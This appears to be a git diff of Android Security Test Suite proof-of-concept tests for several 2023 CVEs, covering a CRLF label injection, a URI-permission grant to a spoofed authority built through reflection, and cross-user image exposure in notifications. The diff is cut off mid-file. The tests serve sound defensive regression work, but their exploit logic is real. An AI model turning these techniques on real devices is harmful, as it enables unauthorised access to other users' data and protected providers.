diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21260/src/android/security/cts/CVE_2023_21260/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21260/src/android/security/cts/CVE_2023_21260/DeviceTest.java
new file mode 100644
index 0000000..6d7b97e
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21260/src/android/security/cts/CVE_2023_21260/DeviceTest.java
@@ -0,0 +1,88 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21260;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.content.Intent;
+import android.provider.Settings;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.BySelector;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.Until;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.regex.Pattern;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+ @Test
+ public void testCVE_2023_21260() {
+ try {
+ final int waitMS = 5_000;
+ Instrumentation instrumentation = getInstrumentation();
+ UiDevice device = UiDevice.getInstance(instrumentation);
+
+ // Launch Notification listener settings
+ instrumentation
+ .getContext()
+ .startActivity(
+ new Intent(Settings.ACTION_NOTIFICATION_LISTENER_SETTINGS)
+ .addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
+ .addFlags(Intent.FLAG_ACTIVITY_CLEAR_TASK));
+
+ // Click on '__CVE_2023_21260' to launch Notification access permission dialog box for
+ // the TestListener
+ Pattern testListenerPattern =
+ Pattern.compile("__CVE_2023_21260", Pattern.CASE_INSENSITIVE);
+ assumeTrue(
+ "Test app not found in Notification access app list",
+ device.wait(Until.hasObject(By.text(testListenerPattern)), waitMS));
+ final String carSettingsPackage = device.getCurrentPackageName();
+ device.findObject(By.text(testListenerPattern)).click();
+
+ // Find Notification access permission dialog box
+ final BySelector popupTitleAutomotiveSelector =
+ By.clazz(android.widget.TextView.class.getName())
+ .res(carSettingsPackage + ":id/car_ui_alert_title")
+ .pkg(carSettingsPackage);
+ assumeTrue(
+ "Notification access permission dialog box not found",
+ device.wait(Until.hasObject(popupTitleAutomotiveSelector), waitMS));
+
+ // With fix, the CRLF characters in the TestListener label would be removed
+ assertFalse(
+ "Vulnerable to b/259384309",
+ device.findObject(popupTitleAutomotiveSelector)
+ .getText()
+ .contains("\n\nCVE_2023_21260_TestListener_BugPresent"));
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21260/src/android/security/cts/CVE_2023_21260/TestListener.java
similarity index 70%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to hostsidetests/securitybulletin/test-apps/CVE-2023-21260/src/android/security/cts/CVE_2023_21260/TestListener.java
index 4416990..6ffd19b 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21260/src/android/security/cts/CVE_2023_21260/TestListener.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2023 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -14,9 +14,8 @@
* limitations under the License.
*/
-package android.security.cts.CVE_2022_20143;
+package android.security.cts.CVE_2023_21260;
-import android.app.Activity;
+import android.service.notification.NotificationListenerService;
-public class PocActivity extends Activity {
-}
+public class TestListener extends NotificationListenerService {}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/Android.bp
new file mode 100644
index 0000000..bc60c24
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/Android.bp
@@ -0,0 +1,47 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21272-test",
+ srcs: [
+ "test-app/src/**/*.java"
+ ],
+ test_suites: [
+ "sts",
+ ],
+ manifest: "test-app/AndroidManifest.xml",
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ ],
+ platform_apis: true,
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21272-helper",
+ test_suites: [
+ "sts",
+ ],
+ srcs: [
+ "helper-app/src/**/*.java"
+ ],
+ manifest: "helper-app/AndroidManifest.xml",
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/helper-app/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/helper-app/AndroidManifest.xml
new file mode 100644
index 0000000..95ced3d
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/helper-app/AndroidManifest.xml
@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21272_helper">
+ <application>
+ <activity android:name=".PocActivity"
+ android:exported="true" />
+ </application>
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/helper-app/src/android/security/cts/CVE_2023_21272_helper/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/helper-app/src/android/security/cts/CVE_2023_21272_helper/PocActivity.java
new file mode 100644
index 0000000..744cc754
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/helper-app/src/android/security/cts/CVE_2023_21272_helper/PocActivity.java
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21272_helper;
+
+import static android.content.pm.PackageManager.PERMISSION_GRANTED;
+
+import android.app.Activity;
+import android.content.Intent;
+import android.net.Uri;
+import android.os.Process;
+
+public class PocActivity extends Activity {
+ @Override
+ protected void onResume() {
+ super.onResume();
+
+ // If current package has permission to 'downloads' authority then send broadcast
+ if (this.checkUriPermission(
+ Uri.parse("content://downloads/all_downloads"),
+ Process.myPid(),
+ Process.myUid(),
+ 0 /* modeFlags */)
+ == PERMISSION_GRANTED) {
+ sendBroadcast((getIntent().getParcelableExtra(Intent.EXTRA_INTENT)));
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/test-app/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/test-app/AndroidManifest.xml
new file mode 100644
index 0000000..7afe635
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/test-app/AndroidManifest.xml
@@ -0,0 +1,28 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21272_test">
+ <application>
+ <provider android:name=".TestProvider"
+ android:authorities="download"
+ android:grantUriPermissions="true"
+ android:enabled="true" />
+ </application>
+ <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2023_21272_test" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/test-app/src/android/security/cts/CVE_2023_21272_test/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/test-app/src/android/security/cts/CVE_2023_21272_test/DeviceTest.java
new file mode 100644
index 0000000..3909376
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/test-app/src/android/security/cts/CVE_2023_21272_test/DeviceTest.java
@@ -0,0 +1,123 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21272_test;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+
+import android.app.ActivityManager;
+import android.content.BroadcastReceiver;
+import android.content.Context;
+import android.content.Intent;
+import android.content.IntentFilter;
+import android.net.Uri;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.lang.reflect.Constructor;
+import java.util.concurrent.Semaphore;
+import java.util.concurrent.TimeUnit;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+ @Test
+ public void testCVE_2023_21272() {
+ try {
+ Context context = getInstrumentation().getContext();
+
+ // 'Path', 'PathPart', and 'HierarchicalUri' classes are in default scope of Uri.java.
+ // Hence, reflection is used to access their APIs
+ final String targetPkg = "android.security.cts.CVE_2023_21272_helper";
+ Class partClass = Class.forName("android.net.Uri$Part");
+ Constructor partConstructor =
+ partClass.getDeclaredConstructor(String.class, String.class);
+ partConstructor.setAccessible(true);
+
+ Class pathPartClass = Class.forName("android.net.Uri$PathPart");
+ Constructor pathPartConstructor =
+ pathPartClass.getDeclaredConstructor(String.class, String.class);
+ pathPartConstructor.setAccessible(true);
+
+ Class hierarchicalUriClass = Class.forName("android.net.Uri$HierarchicalUri");
+ Constructor hierarchicalUriConstructor =
+ hierarchicalUriClass.getDeclaredConstructor(
+ String.class, partClass, pathPartClass, partClass, partClass);
+ hierarchicalUriConstructor.setAccessible(true);
+
+ final String testAuthority = "download";
+ Object authority = partConstructor.newInstance(testAuthority, testAuthority);
+ final String testPath = "s/all_downloads";
+ Object path = pathPartConstructor.newInstance(testPath, testPath);
+ Uri testUri =
+ (Uri)
+ hierarchicalUriConstructor.newInstance(
+ "content",
+ authority,
+ path,
+ null /* query */,
+ null /* fragment */);
+ Semaphore broadcastReceived = new Semaphore(0);
+ final String broadcastAction = "CVE_2023_21272_broadcastAction";
+
+ // Register a broadcast receiver to receive broadcast from PocActivity indicating
+ // presence of vulnerability
+ BroadcastReceiver broadcastReceiver =
+ new BroadcastReceiver() {
+ @Override
+ public void onReceive(Context context, Intent intent) {
+ try {
+ if (intent.getAction().equals(broadcastAction)) {
+ broadcastReceived.release();
+ }
+ } catch (Exception ignored) {
+ // ignore any exceptions
+ }
+ }
+ };
+
+ context.registerReceiver(broadcastReceiver, new IntentFilter(broadcastAction));
+
+ // Grant read uri permission to 'targetPkg' for 'testUri'
+ ActivityManager.getService()
+ .grantUriPermission(
+ context.getIApplicationThread(),
+ targetPkg,
+ testUri,
+ Intent.FLAG_GRANT_READ_URI_PERMISSION,
+ context.getUserId());
+
+ // Check if the uri permission was granted to correct authority or not. Without fix,
+ // permission is granted to 'downloads' authority and the test fails
+ context.startActivity(
+ new Intent()
+ .setClassName(targetPkg, targetPkg + ".PocActivity")
+ .putExtra(Intent.EXTRA_INTENT, new Intent(broadcastAction))
+ .addFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+ assertFalse(
+ "Vulnerable to b/227471459",
+ broadcastReceived.tryAcquire(5_000 /* waitMs */, TimeUnit.MILLISECONDS));
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/test-app/src/android/security/cts/CVE_2023_21272_test/TestProvider.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/test-app/src/android/security/cts/CVE_2023_21272_test/TestProvider.java
new file mode 100644
index 0000000..cb5f575
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/test-app/src/android/security/cts/CVE_2023_21272_test/TestProvider.java
@@ -0,0 +1,61 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21272_test;
+
+import android.content.ContentProvider;
+import android.content.ContentValues;
+import android.database.Cursor;
+import android.net.Uri;
+
+public class TestProvider extends ContentProvider {
+ public TestProvider() {}
+
+ @Override
+ public int delete(Uri uri, String selection, String[] selectionArgs) {
+ return 0;
+ }
+
+ @Override
+ public String getType(Uri uri) {
+ return "";
+ }
+
+ @Override
+ public Uri insert(Uri uri, ContentValues values) {
+ return null;
+ }
+
+ @Override
+ public boolean onCreate() {
+ return false;
+ }
+
+ @Override
+ public Cursor query(
+ Uri uri,
+ String[] projection,
+ String selection,
+ String[] selectionArgs,
+ String sortOrder) {
+ return null;
+ }
+
+ @Override
+ public int update(Uri uri, ContentValues values, String selection, String[] selectionArgs) {
+ return 0;
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/Android.bp
new file mode 100644
index 0000000..a1460c4
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/Android.bp
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21279",
+ defaults: [
+ "cts_defaults",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ "androidx.test.uiautomator_uiautomator",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/AndroidManifest.xml
new file mode 100644
index 0000000..4a3a362
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/AndroidManifest.xml
@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21279">
+ <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
+
+ <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2023_21279" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/res/layout/cve_2023_21279_layout.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/res/layout/cve_2023_21279_layout.xml
new file mode 100644
index 0000000..2d6ff03
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/res/layout/cve_2023_21279_layout.xml
@@ -0,0 +1,21 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<ImageView xmlns:android="http://schemas.android.com/apk/res/android"
+ android:id="@+id/cve_2023_21279_img"
+ android:layout_width="match_parent"
+ android:layout_height="match_parent" />
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/src/android/security/cts/CVE_2023_21279/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/src/android/security/cts/CVE_2023_21279/DeviceTest.java
new file mode 100644
index 0000000..9041934
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/src/android/security/cts/CVE_2023_21279/DeviceTest.java
@@ -0,0 +1,150 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21279;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertNull;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.app.Notification;
+import android.app.NotificationChannel;
+import android.app.NotificationManager;
+import android.app.UiAutomation;
+import android.content.ContentProvider;
+import android.content.Context;
+import android.content.pm.UserInfo;
+import android.graphics.drawable.Icon;
+import android.net.Uri;
+import android.os.UserManager;
+import android.provider.MediaStore;
+import android.util.SizeF;
+import android.widget.RemoteViews;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.Until;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.HashMap;
+import java.util.List;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+ private AutoCloseable withAdoptShellPermissionIdentity(
+ UiAutomation uiAutomation, String permission) {
+ uiAutomation.adoptShellPermissionIdentity(permission);
+
+ // Remove permissions
+ return () -> uiAutomation.dropShellPermissionIdentity();
+ }
+
+ @Test
+ public void testPocCVE_2023_21279() {
+ UiDevice uiDevice = null;
+ try {
+ final String cveId = "cve_2023_21279_";
+ final String title = cveId + "title";
+ final Uri externalContentUri = MediaStore.Images.Media.EXTERNAL_CONTENT_URI;
+
+ Instrumentation instrumentation = getInstrumentation();
+ Context context = instrumentation.getContext();
+ UiAutomation uiAutomation = instrumentation.getUiAutomation();
+ uiDevice = UiDevice.getInstance(instrumentation);
+ int userId = -1;
+
+ // Retrieve created user Id
+ try (AutoCloseable withAdoptShellPermissionIdentity =
+ withAdoptShellPermissionIdentity(
+ uiAutomation, android.Manifest.permission.CREATE_USERS)) {
+ final List<UserInfo> list = context.getSystemService(UserManager.class).getUsers();
+ for (UserInfo info : list) {
+ if (info.name.contains(cveId)) {
+ userId = info.id;
+ break;
+ }
+ }
+ }
+ assumeTrue(userId != -1);
+
+ RemoteViews remoteView1 =
+ new RemoteViews(context.getPackageName(), R.layout.cve_2023_21279_layout);
+ remoteView1.setImageViewUri(
+ R.id.cve_2023_21279_img,
+ ContentProvider.maybeAddUserId(externalContentUri, userId));
+ RemoteViews remoteView2 = remoteView1;
+ HashMap<SizeF, RemoteViews> remoteViewsMap = new HashMap<SizeF, RemoteViews>();
+ remoteViewsMap.put(new SizeF(0, 0), remoteView1);
+ remoteViewsMap.put(new SizeF(1, 1), remoteView2);
+ RemoteViews remoteViewOuter = new RemoteViews(remoteViewsMap);
+ NotificationChannel notificationChannel =
+ new NotificationChannel(cveId, cveId, NotificationManager.IMPORTANCE_DEFAULT);
+ NotificationManager notificationManager =
+ context.getSystemService(NotificationManager.class);
+ notificationManager.createNotificationChannel(notificationChannel);
+ Notification notification =
+ new Notification.Builder(context, cveId)
+ .setContentTitle(title)
+ .setSmallIcon(
+ Icon.createWithData(
+ new byte[0] /* data */, 0 /* offset */, 0 /* length */))
+ .setCustomContentView(remoteViewOuter)
+ .setCustomBigContentView(remoteViewOuter)
+ .build();
+ try {
+ notificationManager.notify(0 /* id */, notification);
+ } catch (SecurityException securityException) {
+ if (securityException
+ .getLocalizedMessage()
+ .toLowerCase()
+ .contains(externalContentUri.toString())) {
+ // Ignore exception thrown with fix and exit the test
+ return;
+ } else {
+ throw securityException;
+ }
+ }
+
+ // Open notification shade
+ assumeTrue("Opening notification shade unsuccessful", uiDevice.openNotification());
+
+ // Wait for notification to appear and detect if the remote view is present
+ uiDevice.wait(Until.hasObject(By.text(title)), 3000 /* timeout */);
+ UiObject2 exposedImg =
+ uiDevice.findObject(By.res(context.getPackageName(), cveId + "img"));
+ assertNull(
+ "Device is vulnerable to b/277741109, Other user's images can be exposed in"
+ + " notifications using remote views",
+ exposedImg);
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ try {
+ uiDevice.pressHome();
+ } catch (Exception e) {
+ // Ignore exceptions as the test has finished
+ }
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21285/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21285/Android.bp
new file mode 100644
index 0000000..3700d8b
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21285/Android.bp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21285",
+ defaults: [
+ "cts_defaults",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ "compatibility-device-util-axt",
+ "sts-device-util",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21285/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21285/AndroidManifest.xml
new file mode 100644
index 0000000..46a9d56
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21285/AndroidManifest.xml
@@ -0,0 +1,23 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21285">
+
+ <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2023_21285" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21285/src/android/security/cts/CVE_2023_21285/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21285/src/android/security/cts/CVE_2023_21285/DeviceTest.java
new file mode 100644
index 0000000..5a6dd58
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21285/src/android/security/cts/CVE_2023_21285/DeviceTest.java
@@ -0,0 +1,146 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21285;
+
+import static android.provider.MediaStore.Images.Media.EXTERNAL_CONTENT_URI;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static com.android.sts.common.SystemUtil.poll;
+
+import static org.junit.Assert.assertTrue;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.content.ContentProvider;
+import android.content.Context;
+import android.content.pm.UserInfo;
+import android.media.MediaMetadata;
+import android.media.session.MediaController;
+import android.media.session.MediaSession;
+import android.os.Handler;
+import android.os.HandlerThread;
+import android.os.UserManager;
+import android.util.Log;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.compatibility.common.util.SystemUtil;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.io.IOException;
+import java.util.List;
+import java.util.concurrent.CompletableFuture;
+import java.util.concurrent.TimeUnit;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+ @Test
+ public void testPocCVE_2023_21285() {
+ try {
+ // Get the user id of "cve_2023_21285_user" created in testPocCVE_2023_21285()
+ Instrumentation instrumentation = getInstrumentation();
+ Context context = getInstrumentation().getContext();
+ int testUserId =
+ SystemUtil.runWithShellPermissionIdentity(
+ () -> {
+ UserManager userManager =
+ context.getSystemService(UserManager.class);
+ List<UserInfo> users = userManager.getUsers();
+ int userId = -1;
+ for (UserInfo user : users) {
+ if (user.name.equals("cve_2023_21285_user")) {
+ userId = user.id;
+ break;
+ }
+ }
+ return userId;
+ },
+ android.Manifest.permission.CREATE_USERS);
+ assumeTrue("Unable to find the user cve_2023_21285_user", testUserId != -1);
+
+ // Insert a placeholder content in the new user and query it to see if it has been
+ // inserted successfully
+ final String imagesContentUri = EXTERNAL_CONTENT_URI.toString();
+ assumeTrue(
+ "Failed to insert a placeholder content in the test user",
+ poll(
+ () -> {
+ try {
+ SystemUtil.runShellCommand(
+ instrumentation,
+ String.format(
+ "content insert --user %d --uri %s --bind "
+ + "_display_name:s:cve_2023_21285.jpg",
+ testUserId, imagesContentUri));
+ return SystemUtil.runShellCommand(
+ instrumentation,
+ String.format(
